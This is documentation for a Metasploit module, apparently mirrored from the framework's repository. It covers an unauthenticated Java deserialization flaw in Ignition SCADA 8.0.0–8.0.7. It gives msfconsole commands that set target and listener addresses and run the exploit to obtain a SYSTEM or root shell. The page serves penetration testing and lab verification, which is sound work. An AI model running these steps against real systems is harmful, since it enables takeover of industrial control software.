Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/multi/scada/inductive_ignition_rce.md
Views: 11789
Vulnerable Application
This module exploits a Java deserialization vulnerability in the Inductive Automation Ignition SCADA product, versions 8.0.0 to (and including) 8.0.7. This exploit was tested on versions 8.0.0 and 8.0.7 on both Linux and Windows. The default configuration is exploitable by an unauthenticated attacker, which can achieve remote code execution as SYSTEM on a Windows installation and root on Linux. The vulnerability was discovered and exploited at Pwn2Own Miami 2020 by the Flashback team (Pedro Ribeiro + Radek Domanski).
Vulnerable versions can be downloaded from here: https://inductiveautomation.com/downloads/archive/8.0.7 We have confirmed versions 8.0.0 to 8.0.7 are vulnerable. Once installed, the application must be configured through the web interface on port 8088 before it is vulnerable.
Verification Steps
Install application
Start msfconsole
Do:
use exploit/multi/scada/inductive_ignition_rce
Do:
set rhost <TARGET_IP>
Do:
set lhost <YOUR_IP>
Do:
run
You will get a SYSTEM or root shell